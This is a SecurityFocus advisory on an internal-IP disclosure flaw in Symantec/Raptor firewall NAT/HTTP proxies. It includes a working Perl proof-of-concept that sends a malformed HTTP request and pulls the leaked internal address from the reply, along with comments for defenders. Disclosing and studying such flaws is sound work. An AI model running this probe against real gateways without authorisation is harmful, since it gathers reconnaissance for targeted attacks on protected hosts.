source: https://www.securityfocus.com/bid/17936/info
Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness.
The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers.
An attacker may use this information to carry out targeted attacks against a potentially vulnerable host.
#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot} com
#
# Example run, as given by the original author:
#   sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
#   waiting for timeout (this can take about 1 min.)
#   behind.raptor.com: 10.238.94.67
#
# What this check does: it sends one deliberately malformed HTTP request to
# TCP port 80 of the given host, reads the reply until the peer closes the
# connection, and reports the last dotted-quad it finds in a string of the
# form "http://<a.b.c.d>XXX". Per the advisory text this file ships with
# (BID 17936), that address is the internal IP leaked by the NAT/HTTP proxy
# component.
#
# Notes for defenders:
#   * The request line "getXXX/XXX HTTP/1.0" is not a well-formed HTTP
#     method/URI pair, so it should stand out in proxy or firewall request
#     logs when hunting for use of this check.
#   * A result line "<host>: <ip>" means the gateway disclosed an address;
#     see the vendor guidance referenced from BID 17936 for remediation.
#   * The pattern only requires four dot-separated digit runs; it does not
#     verify that the value is a valid or private address.
#   * No socket timeout is configured here; the script simply blocks until
#     the remote side ends the connection (hence the "waiting" message).

use IO::Socket;

# Unbuffered STDOUT so the progress message appears before the blocking read.
$| = 1;

# Single required argument: the host name or address to check.
my $host = $ARGV[0];
die "$0 <host>\n" unless $host;

# Malformed request line; the XXX marker is what the response pattern
# below keys on.
my $request = "getXXX/XXX HTTP/1.0\n\n";

my %peer = (
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
);
my $sock = IO::Socket::INET->new(%peer);

die "could not open socket: $!\n" unless $sock;

print $sock $request;

print "waiting for timeout (this can take about 1 min.)\n";

# Scan every response line; a later match overwrites an earlier one.
my $ip;
while (my $line = <$sock>) {
    $ip = $1 if $line =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/;
}

# Report the disclosed address, or "failed." when nothing matched.
print defined($ip) ? "$host: $ip\n" : "failed.\n";

close($sock);